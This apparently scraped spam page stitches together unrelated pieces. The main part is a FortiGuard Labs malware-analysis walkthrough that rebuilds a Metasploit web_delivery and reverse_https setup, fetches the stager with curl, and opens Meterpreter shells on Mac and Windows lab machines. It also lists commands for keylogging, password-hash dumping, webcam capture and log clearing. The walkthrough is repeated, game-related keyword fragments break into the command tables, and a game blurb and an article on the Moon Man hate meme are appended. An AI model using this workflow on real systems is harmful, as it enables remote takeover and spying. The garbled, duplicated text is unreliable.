- Attack Of The Moonman Mac Os X
- Attack Of The Moonman Mac Os Catalina
- Attack Of The Moonman Mac Os Update
In the blog we posted on March 22, FortiGuard Labs introduced a new Word Macro malware sample that targets both Apple Mac OS X and Microsoft Windows. After deeper investigation of this malware sample, we can confirm that after a successful infection the post-exploitation agent Meterpreter is run on the infected Mac OS X or Windows system. Meterpreter is part of the Metasploit framework. More information about Meterpreter can be found here.
For this to work, the attacker's server must be running Metasploit as the controller to control the infected systems. Since the attacker's server doesn't currently respond to any requests, we decided to set up a Metasploit to confirm our observation.
Hackers can attack Apple Inc.' S Mac OS X by exploiting an unpatched vulnerability in the open-source Samba file- and print-sharing software that's included with the operating system, Symantec Inc. The Moonman Meme was created in 2007 when internet user 'Farkle' uploaded an offensive video of Mac Tonight on the internet community YTMND, and many other people started to make their own offensive spin-offs of Mac Tonight. Later in 2007, these people made the connection between the KKK's pointed hats and Mac Tonight's (Moonman's. The Game version is exactly identical with itch.io without any difference and you can always get Attack on Toys here fully for Free. Feel free to make any Gameplay content for Attack on Toys (Gameplay video, YouTube, twitch, etc) and any feedback is highly appreciated!:) Minimum: OS: Windows 32-bit/Windows 64-bit; Processor: Intel Core 2 Duo.
This blog provides a walk-through of the attack process with the server we set up, and shows what an attacker can do on an infected system.
Testing Environment
The testing environment consists of three virtual machines running 64-bit Windows 7, 64-bit Mac OS X, and 64-bit Kali Linux, respectively. The Windows 7 machine acts as an infected Windows system, the Mac OS X machine acts as an infected Mac OS X system, and the Kali Linux VM acts as the attacker's server running Metasploit.
Following are the IP addresses of these virtual machines.
Windows 7: 192.168.71.127
Mac OS X: 192.168.71.128
Kali Linux: 192.168.71.129
Setting Up the Metasploit
First, we created a new script file on the Kali Linux VM with Metasploit installed containing the commands required to set Metasploit.
Figure 1 – The content of the script file
Typing 'msfconsole -q -r osx_meterpreter_test' executes Metasploit in quiet mode (-q) and loads the script file (-r) provided.
Figure 2 – Running Metasploit
Once the settings are loaded, running the command show options shows the current Metasploit configuration for the session.
Our test uses two Metasploit components. The first is the web_delivery module, and the second is the payload reverse_https.
The SRVHOST and LHOST parameters are set to the Kali Linux's IP address (192.168.71.129). This IP address acts as a listener (for the connect-back connection, listening on TCP/443 (LPORT)) as well as a server (listening on TCP/8080(SRVPORT)) to deliver the reverse_https payload.
The show options command hides certain settings that can only be viewed by the show advanced command. The only setting that is not shown is StagerVerifySSLCert, which we set to false. That prevents the validity of the SSL certificate to be verified while establishing secure communications.
Figure 3 – Showing the options set for the attack
The next step is to execute the run command, which starts the HTTPS reverse handler/server so it is ready for victims to connect. See Figure 4. A piece of Python script code is then generated for infected systems to run.
Figure 4 – Running the attack
Instead of directly executing this code on the victim's machine, however, an HTTPS request is made to see what data the server will reply with. Typing curl -k https://192.168.71.129:8080/, we can see that a chunk of Python script code has been received.
Figure 5 – The Python script code returned to victim
If we compare the code structure between the code found in the malicious Macro and the one generated by Metasploit in the previous step, it is easy to visually identify the same elements (highlighted in yellow), but obviously the base64 data is different.
The next step is to decode the base64 data to reveal the code that will be executed on the victim's machine. To do that, a call to the base64 tool is more than enough, and can be done inside the Metasploit prompt as well.
The command syntax is: echo '
Figure 6 – Decoding the base64 data
Attack Of The Moonman Mac Os X
Simple pong (jackboyman) mac os. In the malware sample, the base64 decoded data is passed to the ExecuteForOSX() function (on the left side of the table). Again, through a comparison between that code and the code generated by Metasploit, we can see that they are same, without counting the URL, which is different.
Demonstrating the attack on Mac OS X
Next, on the Mac OS X machine, we create a new file with the name 'osx_meterpreter.py' that includes the code above (on the right side) generated by Metasploit. It is then executed by calling the Python interpreter with the script as a parameter.
Figure 7 – Running the Python script on the Mac OS X machine
We can now see that the script is executed without any issue. Great!
When going back to the Metasploit prompt on the Kali Linux, we can see that a meterpreter session is opened. The sessions command can be run to see the current meterpreter session. The output shows that an active session with the type 'meterpreter python/osx'. It confirms that the session has been established correctly.
Figure 8 – The Meterpreter session is opened
The command sessions -i 1 is now run to start interaction with the session, so the meterpreter prompt is given. The first command we execute is the meterpreter command called sysinfo, which collects information from the remote infected system, as shown in Figure 9. For this scenario, it shows information from the compromised Mac OS X machine.
Figure 9 – Getting the sys info of the infected Mac OS X
Now, to be a bit more adventurous, the shell command is executed. This command starts a shell on the remote compromised system that can be controlled locally. A 'sh-3.2' prompt appears, and from here we can execute any command that is the OS command run on the remote machine. The id command is executed showing the user's id, which in this case is the 'root' user.
Figure 10 – Getting the shell of the infected Mac OS X
It is also worth a mention that, even if the Metasploit server goes down, the Python process running on the victim's machine stays alive and keeps trying to connect back until the server goes up. Once this happens, the victim's machine is automatically connected and establishes a session with the server.
Demonstrating the attack on Windows 7
On the Windows 7 machine, the first thing we do is to modify the file 'hosts,' as shown below, which you can find in '%SystemRoot%System32driversetc'. This file is used to map host names to IP addresses.
Figure 11 – Modifying the 'hosts' file
As a result, all the request packets directed to pizza.vvlxpress.com will be sent to the Kali Linux machine (192.168.71.129). We then let the 64-bit DLL restore to run inside the powershell.exe process. It will connect to the Kali Linux running Metasploit.
When going back to the Metasploit prompt on the Kali Linux, we see that a meterpreter session has been opened. We then use the sessions command to see the current meterpreter session. The output shows that there's an active session with the type 'meterpreter x64/windows'. The sysinfo command then shows the sys info of the infected Windows system. See Figure 12.
Figure 12 – Getting the sys info of the infected Windows 7 device
After the connection is established, we next check the victim's system information. See Figure 13. We are able to compare it with the information we got in Metasploit (Figure 12.)
Figure 13 – The info of the infected Windows
We then execute the shell command to take control of the infected Windows machine. Figure 14 shows the output of executing the dir command after we get the shell.
Figure 14 – Getting the shell of the infected Windows machine
From here, you can execute any command you want on the infected Windows machine.
As you probably notice, in the output of the shell command there is a line of message reading 'Process 1172 created.' This means that a new cmd.exe with process id 1172 was run on the infected system, which is used to handle commands from the server.
Figure 15 – A new 'cmd.exe' process is created
Conclusion
Based on FortiGuard Labs' analysis and testing, we can confirm the following:
- Meterpreter was used for post-exploitation by the attacker
- The web_delivery module was used by the attacker
- The reverse_https payload was used by the attacker for secure communication
This walk-through shows how this malware is able to take control of the infected system. Once the meterpreter session is established, the attacker can get the sys info of the infected system and execute commands on the infected system.
In fact, meterpreter is a very powerful tool for post-exploitation. In the Appendix, below, you can see the commands it supports. This helps you imagine how serious the consequences of such an attack can be if your system is infected by this malware.
Appendix
The commands that meterpreter supports:
Stdapi: File system Commands
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
Command Description
------- -----------
arp Display the host ARP cache
R place clone mac os. getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands Dragon ball z: run! mac os.
Command Description
------- -----------
The devils gospel mac os. clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process A pirate story mac os.
local time Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
Attack Of The Moonman Mac Os Catalina
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
On the Windows 7 machine, the first thing we do is to modify the file 'hosts,' as shown below, which you can find in '%SystemRoot%System32driversetc'. This file is used to map host names to IP addresses.
Figure 11 – Modifying the 'hosts' file
As a result, all the request packets directed to pizza.vvlxpress.com will be sent to the Kali Linux machine (192.168.71.129). We then let the 64-bit DLL restore to run inside the powershell.exe process. It will connect to the Kali Linux running Metasploit.
When going back to the Metasploit prompt on the Kali Linux, we see that a meterpreter session has been opened. We then use the sessions command to see the current meterpreter session. The output shows that there's an active session with the type 'meterpreter x64/windows'. The sysinfo command then shows the sys info of the infected Windows system. See Figure 12.
Figure 12 – Getting the sys info of the infected Windows 7 device
After the connection is established, we next check the victim's system information. See Figure 13. We are able to compare it with the information we got in Metasploit (Figure 12.)
Figure 13 – The info of the infected Windows
We then execute the shell command to take control of the infected Windows machine. Figure 14 shows the output of executing the dir command after we get the shell.
Figure 14 – Getting the shell of the infected Windows machine
From here, you can execute any command you want on the infected Windows machine.
As you probably notice, in the output of the shell command there is a line of message reading 'Process 1172 created.' This means that a new cmd.exe with process id 1172 was run on the infected system, which is used to handle commands from the server.
Figure 15 – A new 'cmd.exe' process is created
Conclusion
Based on FortiGuard Labs' analysis and testing, we can confirm the following:
- Meterpreter was used for post-exploitation by the attacker
- The web_delivery module was used by the attacker
- The reverse_https payload was used by the attacker for secure communication
This walk-through shows how this malware is able to take control of the infected system. Once the meterpreter session is established, the attacker can get the sys info of the infected system and execute commands on the infected system.
In fact, meterpreter is a very powerful tool for post-exploitation. In the Appendix, below, you can see the commands it supports. This helps you imagine how serious the consequences of such an attack can be if your system is infected by this malware.
Appendix
The commands that meterpreter supports:
Stdapi: File system Commands
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
Command Description
------- -----------
arp Display the host ARP cache
R place clone mac os. getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands Dragon ball z: run! mac os.
Command Description
------- -----------
The devils gospel mac os. clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process A pirate story mac os.
local time Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
Attack Of The Moonman Mac Os Catalina
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
Command Description
Attack Of The Moonman Mac Os Update
------- -----------
timestomp Manipulate file MACE attributes
Mac Tonight | |
---|---|
Mac Tonight animatronic at Solid Gold McDonald's in Greenfield, Wisconsin | |
First appearance | 1986 |
Created by | Davis, Johnson, Mogul & Colombatto |
Portrayed by | Doug Jones (1986–1997) |
Voiced by | Roger Behr (1986–1990) |
In-universe information | |
Gender | Male |
Occupation | Nighttime mascot for the McDonald'sfast food restaurant chain |
Mac Tonight is a fictional character used in the marketing for McDonald's restaurants during the mid-1980s. Known for his crescent moon head, sunglasses and piano-playing, the character used the song 'Mack the Knife' which was made famous in the United States by Bobby Darin. Throughout the campaign, Mac was performed by actor Doug Jones in his fourth Hollywood job and voiced by Roger Behr.
Originally conceived as a promotion to increase dinner sales by Southern California licensees, Mac Tonight's popularity led McDonald's to take it nationwide in 1987. Although McDonald's ceased airing the commercials and retired the character after settling a lawsuit brought by Darin's estate in 1989, the company reintroduced the character nineteen years later throughout Southeast Asia in 2007.
History
Original marketing campaign (1986–1989)
The campaign was created locally for California McDonald's franchisees by Los Angeles advertising firm Davis, Johnson, Mogul & Colombatto.[1] Looking to increase the after-4 p.m. dinner business, the agency was inspired by the song 'Mack the Knife' by Kurt Weill and Bertolt Brecht, which was made famous in the United States by Bobby Darin in 1959 and listened to different versions of it before opting to create an original version with new lyrics.[1] After deciding not to feature real people or celebrities, the designers settled on an anthropomorphic crooner moon on a man's body with 1950s-style sunglasses; the song and style were designed to appeal to baby boomers and a revival of 1950s-style music in popular culture.[1] The character, who played a grand piano atop either a floating cloud or a giant Big Mac (hence the name), was intended to garner a 'cult-like' following, e.g. Max Headroom.[1]
From 1986 to 1987, the campaign expanded to other cities on the American West Coast. McDonald's said that the campaign had 'great success' while trade magazine Nation's Restaurant News announced that it had contributed to increases of over 10% in dinnertime business at some Californian restaurants.[1] A crowd of 1,500 attended the visit of a costumed character to a Los Angeles McDonald's.[1] Despite concerns that he was too typical of the West Coast, in February 1987 it was decided that the character would feature on national advertisements which went to air that September and he attracted a crowd of 1,000 in Boca Raton, Florida.[1] During this period, Happy Meal toys modeled after the character were also released at participating McDonald's restaurants.[2] A September 1987 survey by Ad Watch found that the number of consumers who recalled McDonald's advertising before any other doubled from the previous month, and was higher than any company since the New Coke launch in 1985.[1]
Doug Jones performed Mac Tonight for over 27 commercials for three years. Years later in 2013, he recalled '[T]hat's when my career took a turn that I was not expecting. I didn't know that was a career option.'[3] Mac Tonight's voice was provided by Roger Behr.[4] Director Peter Coutroulis, who won a Clio Award for a previous campaign for Borax, pitched several commercials which did not air, including an E.T.-like one in which two astronomers watch Mac Tonight drive his Cadillac through the sky.[1]
In 1989, Bobby Darin's son Dodd Mitchell Darin claimed that the song infringed upon his father's trademark without prior permission and filed a lawsuit as well as an injunction for the song to be removed from both TV and radio ads.[5] As a response to the lawsuit, McDonald's stopped airing the commercials and retired the character after nearly four years of usage.
Reintroduction in Southeast Asia (2007)
In 2007, McDonald's brought back the character in territories throughout Southeast Asia such as in Singapore, Malaysia, Indonesia and the Philippines.[6] The new Asian-exclusive campaign featured a CGI-animated Mac Tonight dancing atop a McDonald's restaurant while singing and playing a saxophone rather than a grand piano as he played in the original advertising campaign in the United States.[7]
Animatronics
In addition to the advertising campaign, a number of McDonald's restaurants during the early 1990s were also fitted with Mac Tonight animatronic figures which featured the character seated in front of a piano and playing it.[8] The most and only prominent McDonald's restaurant to still feature one of the animatronics is the World's Largest Entertainment McDonald's in Orlando, Florida.[9] Other known locations include a Greenfield, Wisconsin McDonald's known as the Solid Gold McDonald's, prior to undergoing major renovations in 2011.[10]
NASCAR
Between 1997 and 1998, McDonald's sponsored NASCAR Hall of Famer Bill Elliott with Mac Tonight featured on his car.[11] In 2016, the Mac Tonight theme was McDonald's driver Jamie McMurray's Chip Ganassi Racing No. 1 Chevrolet SS throwback scheme for Darlington Raceway's Southern 500.[12]
Legacy
Mac Tonight has appeared on the cover of Saint Pepsi's album Late Night Delight (with Luxury Elite).[13][14] and an episode of The Simpsons, 'Kiss Kiss, Bang Bangalore'.[2]
Moon Man
Moon Man is an unofficial parody of Mac Tonight in which the character is depicted as advocating for racism, white supremacy, antisemitism, neo-Nazism, terrorism, race war and genocide. The character originated in 2007 when Internet user 'farkle' created a site on the Internet community YTMND, which shown a video loop of Mac Tonight with the reggaeton song 'Chacarron Macarron' by El Chombo in the background. Using a text-to-speech program by AT&T, more Moon Man pages were created some of which included the program uttering 'KKK' (a nod to the Ku Klux Klan) repeatedly in the background audio. Other users made Moon Man sing and rap. The first such video had him performing 'Money in the Bank' by Lil Scrappy with few lyrical changes apart from Moon Man's name being inserted into the song and a chorus chanting for the Ku Klux Klan ('KKK, KKK, KKK'). Further videos were made portraying Moon Man as a racist.[6]
In 2008, the YTMND Moon Man group was created to make and spread Moon Man content on YTMND. On October 2, 2008, a racist parody of 'Hypnotize' by the Notorious B.I.G., commonly known as 'Notorious KKK', was created by YTMND user MluMluxMlan. It gained over 119,000 views over the next seven years. In 2015, the character spread to websites such as 4chan and 8chan, as part of the alt-right movement. New songs were made supporting police brutality and celebrating the Orlando nightclub shooting.[6] On June 1, 2015, an album of Moon Man songs was released under the title WhiteTopia with the YouTube version accumulating 130,000 views.[citation needed]
Reception and impact
Salon compared Moon Man to Pepe the Frog, another meme labeled as a hate symbol.[6] Moon Man also appeared in the background of a billboard in support of the Donald Trump 2016 presidential campaign for which far-right activist Charles C. Johnson raised funds to place in the swing state of Pennsylvania, depicting Pepe the Frog as Donald Trump guarding the wall on the Mexico–United States border.[15]
YouTube consistently removes Moon Man videos for violating its community guidelines on hate speech, and AT&T has edited its text-to-speech software to filter out the character's name and obscenities.[6] On September 26, 2019, the Anti-Defamation League added Moon Man to their database of hate symbols.[16][17][18]
The racist and anti-Semitic Terrorist from Halle synagogue shooting used the meme before his attack. he puplised a Selfie on the date of 8. 8. 2019, showing him in uniform and with a button of the 'Moon Man'. The BKA investigators initially did not classify the picture as idiological due to ignorance and assigned it to the right-wing extremist online community.[19]
References
- ^ abcdefghiPrescott, Eileen (November 29, 1987). 'The Making of 'Mac Tonight''. The New York Times. Retrieved February 28, 2015.
- ^ abBurke, Timothy (December 22, 2014). 'Rape, Murder, Violent Racism: The Weirdest McDonald's Ad Campaign Ever'. Deadspin. Retrieved July 28, 2015.
- ^Radish, Christina (June 26, 2013). 'Doug Jones Talks FALLING SKIES Season 3, the Makeup Process, His Career, His Desire to Make HELLBOY 3, and More'. Collider. Retrieved December 2, 2015.
- ^'Roger Behr'. Patterson & Associates. Archived from the original on June 19, 2005.
- ^'Darin's Son Sues McDonald's'. Deseret News. October 15, 1989. Retrieved August 30, 2012.
- ^ abcdeSheffield, Matthew (October 25, 2016). 'Meet Moon Man: The alt-right's racist rap sensation, borrowed from 1980s McDonald's ads'. Salon. Archived from the original on January 29, 2019. Retrieved January 31, 2019.
- ^Mac Tonight commercial in Southeast Asia (commercial). McDonald's Corporation. 2007.
- ^Ocker, J.W. (March 21, 2012). 'Mac Tonight'. Odd Things I've Seen. Retrieved July 12, 2018.
- ^Kubersky, Seth (March 16, 2016). 'World's Largest Entertainment McDonald's reopens on International Drive'. Attractions Magazine. Retrieved July 12, 2018.
- ^Snyder, Molly (March 28, 2011). 'So long, Solid Gold McDonald's'. OnMilwaukee. Retrieved September 6, 2018.
- ^'Driver Bill Elliott 1997 NASCAR Winston Cup Results'. Racing-Reference.info. Retrieved December 2, 2015.
- ^Jensen, Tom (August 15, 2016). 'Jamie McMurray unveils 'Mac Tonight' Darlington throwback scheme'. FoxSports.com. Archived from the original on August 15, 2016. Retrieved August 30, 2016.
- ^Beauchamp, Scott (August 18, 2016). 'How Vaporwave Was Created Then Destroyed by the Internet'. Esquire. Archived from the original on August 19, 2016. Retrieved August 26, 2016.
- ^Minor, Jordan (May 19, 2016). 'McDonald's Mac Tonight should make a comeback as the lead in a fast food cinematic universe'. Geek.com. Archived from the original on May 20, 2016. Retrieved August 25, 2016.
- ^Kavanaugh, Shane Dixon (October 6, 2016). 'Trump-Inspired Pepe The Frog Billboards To Hit Battleground State'. Vocativ. Archived from the original on November 27, 2016. Retrieved November 26, 2016.
- ^''OK' and Other Alt Right Memes and Slogans Added to ADL's Hate Symbols Database' (Press release). New York City: Anti-Defamation League. September 26, 2019. Retrieved December 29, 2019.
- ^Allyn, Bobby (September 26, 2019). 'The 'OK' Hand Gesture Is Now Listed As A Symbol Of Hate'. Boise State Public Radio. Retrieved November 16, 2019.
- ^Kunzelman, Michael (September 26, 2019). ''OK' hand gesture, 'Bowlcut' added to hate symbols database'. Associated Press. Retrieved November 24, 2020.
- ^'Die Erkenntnisse aus dem Halle-Prozess'. tagesschau.de.